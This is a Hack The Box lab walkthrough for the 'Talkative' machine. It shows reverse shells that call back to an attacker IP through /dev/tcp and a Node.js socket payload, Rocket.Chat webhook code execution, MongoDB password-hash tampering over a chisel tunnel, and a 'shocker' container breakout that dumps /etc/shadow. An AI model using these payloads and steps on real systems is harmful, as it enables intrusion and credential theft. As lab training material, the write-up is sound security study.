Hack-The-Box-walkthrough[talkactive]

Posted on Edited on In Views: Word count in article: 2.6k Reading time ≈ 9 mins.

introduce

OS: Linux
Difficulty: Hard
Points: 40
Release: 09 Apr 2022
IP: 10.10.11.155

  • my htb rank

Enumeration

NMAP

1
2
3
4
5
6
7
8
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.155
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.52
3000/tcp open  ppp?
8080/tcp open  http    Tornado httpd 5.0
8081/tcp open  http    Tornado httpd 5.0
8082/tcp open  http    Tornado httpd 5.0

we found several web service:

  • Bolt CMS

  • jamovi 0.9.5.5

  • ROCKET.CHAT

initial shell

go to :8080, open RJ editor add this line excecute ruby command to get a shell. =>

1
system("bash -c 'bash -i >& /dev/tcp/10.10.14.18/9001 0>&1'",intern=TRUE)

and we found a .omv file, just download and extract it and u will get creds.

i used pwncat, so it could download or upload files easily

  • pwncat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
(remote) root@b06821bbda78:/root# ls
Documents  bolt-administration.omv
(local) pwncat$ download /root/bolt-administration.omv ./bolt-administration.omv
/root/bolt-administration.omv ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 2.2/2.2 KB • ? • 0:00:00
[09:41:08] downloaded 2.19KiB in 2.86 seconds

┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# file bolt-administration.omv 
bolt-administration.omv: Zip archive data, at least v2.0 to extract, compression method=deflate
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# unzip bolt-administration.omv 
Archive:  bolt-administration.omv
  inflating: META-INF/MANIFEST.MF    
  inflating: meta                    
  inflating: index.html              
  inflating: metadata.json           
  inflating: xdata.json              
  inflating: data.bin                
  inflating: 01 empty/analysis
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# cat xdata.json | jq .   
{
  "A": {
    "labels": [
      [
        0,
        "Username",
        "Username",
        false
      ],
      [
        1,
        "matt@talkative.htb",
        "matt@talkative.htb",
        false
      ],
      [
        2,
        "janit@talkative.htb",
        "janit@talkative.htb",
        false
      ],
      [
        3,
        "saul@talkative.htb",
        "saul@talkative.htb",
        false
      ]
    ]
  },
  "B": {
    "labels": [
      [
        0,
        "Password",
        "Password",
        false
      ],
      [
        1,
        "jeO09ufhWD<s",
        "jeO09ufhWD<s",
        false
      ],
      [
        2,
        "bZ89h}V<S_DA",
        "bZ89h}V<S_DA",
        false
      ],
      [
        3,
        ")SQWGm>9KHEA",
        ")SQWGm>9KHEA",
        false
      ]
    ]
  },
  "C": {
    "labels": []
  }
}

now Go to :80, /bolt login with the creds:

1
admin:jeO09ufhWD<s

now Modify the http://talkative.htb/bolt/file-edit/config?file=/bundles.php bundles file, add a PHP rev shell, u will get shell on another container.

on the container as www-data, use ssh to login on main host ssh saul@172.18.0.1 with the same bolt password

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# pwncat-cs -lp 1234                           
[09:52:38] Welcome to pwncat 🐈!                                                                                     __main__.py:164
[09:54:49] received connection from 10.10.11.155:60622                                                                    bind.py:84
[09:54:56] 0.0.0.0:1234: upgrading from /bin/dash to /bin/bash                                                        manager.py:957
[09:54:59] 10.10.11.155:60622: registered new host w/ db                                                              manager.py:957
(local) pwncat$ back
(remote) www-data@ad8ae3998918:/$ ls
bin  boot  dev  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
(remote) www-data@ad8ae3998918:/$ ssh saul@172.18.0.1
The authenticity of host '172.18.0.1 (172.18.0.1)' can't be established.
ECDSA key fingerprint is SHA256:kUPIZ6IPcxq7Mei4nUzQI3JakxPUtkTlEejtabx4wnY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/var/www/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
saul@172.18.0.1's password: 
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-81-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 10 Apr 2022 01:56:50 PM UTC

  System load:                      0.0
  Usage of /:                       78.5% of 8.80GB
  Memory usage:                     70%
  Swap usage:                       2%
  Processes:                        392
  Users logged in:                  1
  IPv4 address for br-ea74c394a147: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.11.155
  IPv6 address for eth0:            dead:beef::250:56ff:feb9:3aae


18 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Apr 10 12:46:40 2022 from 172.17.0.13
saul@talkative:~$ id
uid=1000(saul) gid=1000(saul) groups=1000(saul)
saul@talkative:~$ whoami
saul
saul@talkative:~$ cat user.txt 
e2503f45e99ee3fec7c7a4f44c5c87ed

and we get our user flag

move on to root

pspy found some interesting process

1
2
3
4
2022/04/09 21:31:01 CMD: UID=0    PID=79640  | /bin/sh -c cp /root/.backup/passwd /etc/passwd 
2022/04/09 21:31:01 CMD: UID=0    PID=84170  | cp /root/.backup/shadow /etc/shadow 
2022/04/09 21:51:01 CMD: UID=0    PID=84169  | python3 /root/.backup/update_mongo.py 
2022/04/09 21:51:01 CMD: UID=0    PID=84172  | python3 /root/.backup/update_mongo.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
tcp        0      0 172.17.0.1:6000         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 172.17.0.1:6001         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:8081            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 172.17.0.1:6002         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:8082            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 172.17.0.1:6003         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 172.17.0.1:6004         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 172.17.0.1:6005         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 172.17.0.1:6006         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 172.17.0.1:6007         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 172.17.0.1:6008         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 172.17.0.1:6009         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 172.17.0.1:6010         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 172.17.0.1:6011         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 172.17.0.1:6012         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 172.17.0.1:6013         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 172.17.0.1:6014         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 172.17.0.1:6015         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 172.18.0.1:22           172.17.0.13:37184       ESTABLISHED keepalive (6455.50/0/0)
tcp6       0      0 :::8080                 :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::8081                 :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::8082                 :::*                    LISTEN      off (0.00/0/0)
udp        0      0 127.0.0.1:39995         127.0.0.53:53           ESTABLISHED off (0.00/0/0)

after ip range and port scan, we known, now use chisel port forward mongo DB 172.17.0.2:27017 and change admins password for rocket.chat

  • chisel
1
2
3
4
5
saul@talkative:~$ ./chisel client 10.10.14.18:4444 R:27017:172.17.0.2:27017 &
[1] 6493
saul@talkative:~$ 2022/04/10 14:13:52 client: Connecting to ws://10.10.14.18:4444

saul@talkative:~$ 2022/04/10 14:13:55 client: Connected (Latency 371.579937ms)
1
2
3
4
5
6
┌──(root💀kali)-[~/hackthebox/endgame/ascension]
└─# ./chisel server -p 4444 --reverse
2022/04/10 06:04:31 server: Reverse tunnelling enabled
2022/04/10 06:04:31 server: Fingerprint YV//bCvnlszVb4QzNq2stvLbKxLfQ33OQ4mKu6Y5zME=
2022/04/10 06:04:31 server: Listening on http://0.0.0.0:4444
2022/04/10 06:04:37 server: session#1: tun: proxy#R:27017=>172.17.0.2:27017: Listening

now we have to install mongosh to connect to mongodb, and enum some information:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
$ wget https://downloads.mongodb.com/compass/mongodb-mongosh_1.3.1_amd64.deb
$ dpkg -i mongodb-mongosh_1.3.1_amd64.deb
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# mongosh "mongodb://LOCALHOST:27017" 
Current Mongosh Log ID: 6252e6b51f6c27d3c8cfc72a
Connecting to:          mongodb://LOCALHOST:27017/?directConnection=true&appName=mongosh+1.3.1
Using MongoDB:          4.0.26
Using Mongosh:          1.3.1

For mongosh info see: https://docs.mongodb.com/mongodb-shell/

------
   The server generated these startup warnings when booting:
   2022-04-10T12:32:16.345+0000: 
   2022-04-10T12:32:16.345+0000: ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
   2022-04-10T12:32:16.345+0000: **          See http://dochub.mongodb.org/core/prodnotes-filesystem
   2022-04-10T12:32:18.390+0000: 
   2022-04-10T12:32:18.390+0000: ** WARNING: Access control is not enabled for the database.
   2022-04-10T12:32:18.390+0000: **          Read and write access to data and configuration is unrestricted.
   2022-04-10T12:32:18.391+0000: 
------

rs0 [direct: primary] test> show databases
admin    106 kB
config   160 kB
local   11.9 MB
meteor  5.08 MB
rs0 [direct: primary] test> use admin
switched to db admin
rs0 [direct: primary] admin> show tables
system.keys
system.version
rs0 [direct: primary] admin> db.system.keys.find()
[
  {
    _id: Long("6994889321446637571"),
    purpose: 'HMAC',
    key: Binary(Buffer.from("6def3ebf131b6d0197852202f4908cf0f279016e", "hex"), 0),
    expiresAt: Timestamp({ t: 1636400583, i: 0 })
  },
  {
    _id: Long("6994889321446637572"),
    purpose: 'HMAC',
    key: Binary(Buffer.from("52057603cc02d6cf032aa2d1dc592ad3f8889b06", "hex"), 0),
    expiresAt: Timestamp({ t: 1644176583, i: 0 })
  },
  {
    _id: Long("7064639126477209602"),
    purpose: 'HMAC',
    key: Binary(Buffer.from("8d89fa517f7aaf2813b681aa0e63bcae2a3238cc", "hex"), 0),
    expiresAt: Timestamp({ t: 1652640475, i: 0 })
  },
  {
    _id: Long("7064639126477209603"),
    purpose: 'HMAC',
    key: Binary(Buffer.from("ede2184b2b29a5eb05cca53adb9246b73dc3c90f", "hex"), 0),
    expiresAt: Timestamp({ t: 1660416475, i: 0 })
  }
]
rs0 [direct: primary] admin> use meteor
switched to db meteor
rs0 [direct: primary] meteor> db.users.find()
[
  {
    _id: 'rocket.cat',
    createdAt: ISODate("2021-08-10T19:44:00.224Z"),
    avatarOrigin: 'local',
    name: 'Rocket.Cat',
    username: 'rocket.cat',
    status: 'online',
    statusDefault: 'online',
    utcOffset: 0,
    active: true,
    type: 'bot',
    _updatedAt: ISODate("2021-08-10T19:44:00.615Z"),
    roles: [ 'bot' ]
  },
  {
    _id: 'ZLMid6a4h5YEosPQi',
    createdAt: ISODate("2021-08-10T19:49:48.673Z"),
    services: {
      password: {
        bcrypt: '$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG'
      },
      resume: {
        loginTokens: [
          {
            when: ISODate("2022-04-10T13:00:11.904Z"),
            hashedToken: 'n3ZC1SRtuFsYyAAcaelzbdMkwWv7bI4IONsiahBenNI='
          }
        ]
      }
    },
    emails: [ { address: 'saul@talkative.htb', verified: false } ],
    type: 'user',
    status: 'offline',
    active: true,
    _updatedAt: ISODate("2022-04-10T13:59:52.416Z"),
    roles: [ 'admin', 'bot' ],
    name: 'Saul Goodman',
    lastLogin: ISODate("2022-04-10T13:00:11.897Z"),
    statusConnection: 'offline',
    username: 'admin',
    utcOffset: 0
  }
]

now we could update admin’s bcrypt hash to change the password:

1
2
3
4
5
6
7
8
9
rs0 [direct: primary] meteor> db.getCollection('users').update({username:"admin"}, { $set: {"services" : { "password" : {"bcrypt" : "$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG" } } } })
DeprecationWarning: Collection.update() is deprecated. Use updateOne, updateMany, or bulkWrite.
{
  acknowledged: true,
  insertedId: null,
  matchedCount: 1,
  modifiedCount: 1,
  upsertedCount: 0
}

then use: admin/12345 to login into rocket.chat pannel

we found target is rocket.chat 2.4.14, is vulnerable

  • Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated)

  • CVE-2021-22911

we can change the following to rev shell:

1
2
3
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec('command here');
1
2
3
4
5
6
7
8
const require = console.log.constructor('return process.mainModule.require')();
var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(1234, "10.10.14.18", function(){
  client.pipe(sh.stdin);
  sh.stdout.pipe(client);
  sh.stderr.pipe(client);
});

then go to: http://talkative.htb:3000/admin/integrations/new, select “Incoming WebHook Integration”

fill in like following pics:

then copy this url, curl it, we got a shell in a container again

1
2
3
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# curl http://talkative.htb:3000/hooks/23fvWJGcJ7b47SGHy/PWHLFZoXrTQLpM5fT2GMzAgxBNhXKD7k3QD3K8nkHcXWAkEZ
{"success":false}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# pwncat-cs -lp 1234
[10:45:00] Welcome to pwncat 🐈!                                                                                     __main__.py:164
[10:45:08] received connection from 10.10.11.155:46286                                                                    bind.py:84
[10:45:16] 0.0.0.0:1234: upgrading from /bin/dash to /bin/bash                                                        manager.py:957
[10:45:20] 10.10.11.155:46286: registered new host w/ db                                                              manager.py:957
(local) pwncat$ back
(remote) root@c150397ccd63:/app/bundle/programs/server# ls
app                boot.js.map    mini-files.js.map        npm-rebuild.js      npm-shrinkwrap.json  program.json
assets             config.json    node_modules             npm-rebuild.js.map  package.json         runtime.js
boot-utils.js      debug.js       npm                      npm-rebuilds.json   packages             runtime.js.map
boot-utils.js.map  debug.js.map   npm-rebuild-args.js      npm-require.js      profile.js           server-json.js
boot.js            mini-files.js  npm-rebuild-args.js.map  npm-require.js.map  profile.js.map       server-json.js.map
(remote) root@c150397ccd63:/app/bundle/programs/server# id
uid=0(root) gid=0(root) groups=0(root)
(remote) root@c150397ccd63:/app/bundle/programs/server# whoami
root

after run some linux enum script, found capabilities cap_dac_read_search

  • shocker: docker PoC VMM-container breakout

first Modify the file, then we compile it in our attack kali machine:

1
2
3
4
5
6
// get a FS reference from something mounted in from outside
if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
    die("[-] open");

if (find_handle(fd1, "/root/root.txt", &root_h, &h) <= 0)
    die("[-] Cannot find valid handle!");
  • Dynamic compilation
1
gcc shocker.c -o shocker
  • Static compilation
1
cc -Wall -std=c99 -O2 shocker.c -static

then upload these binary, then execute it

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
(local) pwncat$ upload ./a.out /root/static
/root/static ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 824.1/824.1 KB • ? • 0:00:00
[10:53:06] uploaded 824.11KiB in 13.93 seconds                                                                          upload.py:76
(local) pwncat$ upload ./shocker /root/shocker
/root/shocker ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 17.2/17.2 KB • ? • 0:00:00
[10:53:48] uploaded 17.21KiB in 4.49 seconds                                                                            upload.py:76
(local) pwncat$ upload ./shadow /root/shadow
/root/shadow ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 17.2/17.2 KB • ? • 0:00:00
[10:53:57] uploaded 17.21KiB in 4.49 seconds                                                                            upload.py:76
(local) pwncat$ back
(remote) root@c150397ccd63:/root# chmod 777 *
(remote) root@c150397ccd63:/root# ./static
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]

<enter>

[*] Resolving 'root/root.txt'
[*] Found lib32
[*] Found ..
[*] Found lost+found
[*] Found sbin
[*] Found bin
[*] Found boot
[*] Found dev
[*] Found run
[*] Found lib64
[*] Found .
[*] Found var
[*] Found home
[*] Found media
[*] Found proc
[*] Found etc
[*] Found lib
[*] Found libx32
[*] Found cdrom
[*] Found root
[+] Match: root ino=18
[*] Brute forcing remaining 32bit. This can take a while...
[*] (root) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'root.txt'
[*] Found ..
[*] Found .backup
[*] Found .config
[*] Found .cache
[*] Found .local
[*] Found .ssh
[*] Found .
[*] Found .profile
[*] Found .bashrc
[*] Found root.txt
[+] Match: root.txt ino=110097
[*] Brute forcing remaining 32bit. This can take a while...
[*] (root.txt) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x11, 0xae, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x11, 0xae, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Win! /etc/shadow output follows:
99a37c0a5b01ffc4ad1204d0dd1bc884

(remote) root@c150397ccd63:/root# ./shadow 
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]

<enter>

[*] Resolving 'etc/shadow'
[*] Found lib32
[*] Found ..
[*] Found lost+found
[*] Found sbin
[*] Found bin
[*] Found boot
[*] Found dev
[*] Found run
[*] Found lib64
[*] Found .
[*] Found var
[*] Found home
[*] Found media
[*] Found proc
[*] Found etc
[+] Match: etc ino=393217
[*] Brute forcing remaining 32bit. This can take a while...
[*] (etc) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x01, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'shadow'
[*] Found modules-load.d
[*] Found lsb-release
[*] Found rsyslog.conf
[*] Found rc6.d
[*] Found calendar
[*] Found fstab
[*] Found shadow
[+] Match: shadow ino=393228
[*] Brute forcing remaining 32bit. This can take a while...
[*] (shadow) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x0c, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x0c, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Win! /etc/shadow output follows:
root:$6$9GrOpvcijuCP93rg$tkcyh.ZwH5w9AHrm66awD9nLzMHv32QqZYGiIfuLow4V1PBkY0xsKoyZnM3.AI.yGWfFLOFDSKsIR9XnKLbIY1:19066:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
sys:*:18659:0:99999:7:::
sync:*:18659:0:99999:7:::
games:*:18659:0:99999:7:::
man:*:18659:0:99999:7:::
lp:*:18659:0:99999:7:::
mail:*:18659:0:99999:7:::
news:*:18659:0:99999:7:::
uucp:*:18659:0:99999:7:::
proxy:*:18659:0:99999:7:::
www-data:*:18659:0:99999:7:::
backup:*:18659:0:99999:7:::
list:*:18659:0:99999:7:::
irc:*:18659:0:99999:7:::
gnats:*:18659:0:99999:7:::
nobody:*:18659:0:99999:7:::
systemd-network:*:18659:0:99999:7:::
systemd-resolve:*:18659:0:99999:7:::
systemd-timesync:*:18659:0:99999:7:::
messagebus:*:18659:0:99999:7:::
syslog:*:18659:0:99999:7:::
_apt:*:18659:0:99999:7:::
tss:*:18659:0:99999:7:::
uuidd:*:18659:0:99999:7:::
tcpdump:*:18659:0:99999:7:::
landscape:*:18659:0:99999:7:::
pollinate:*:18659:0:99999:7:::
usbmux:*:18849:0:99999:7:::
sshd:*:18849:0:99999:7:::
systemd-coredump:!!:18849::::::
lxd:!:18849::::::
saul:$6$19rUyMaBLt7.CDGj$ik84VX1CUhhuiMHxq8hSMjKTDMxHt.ldQC15vFyupafquVyonyyb3/S6MO59tnJHP9vI5GMvbE9T4TFeeeKyg1:19058:0:99999:7:::

we see both Dynamic compilation and Static compilation file works, we are done

Summary of knowledge

  • RJ editor get shell
  • pwncat upload and download files
  • bolt cms get shell
  • chisel port forward MongoDB 27017 port
  • update admin’s bcrypt hash to change the password
  • rocket.chat rce
  • shocker: docker PoC VMM-container breakout to get root flag

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…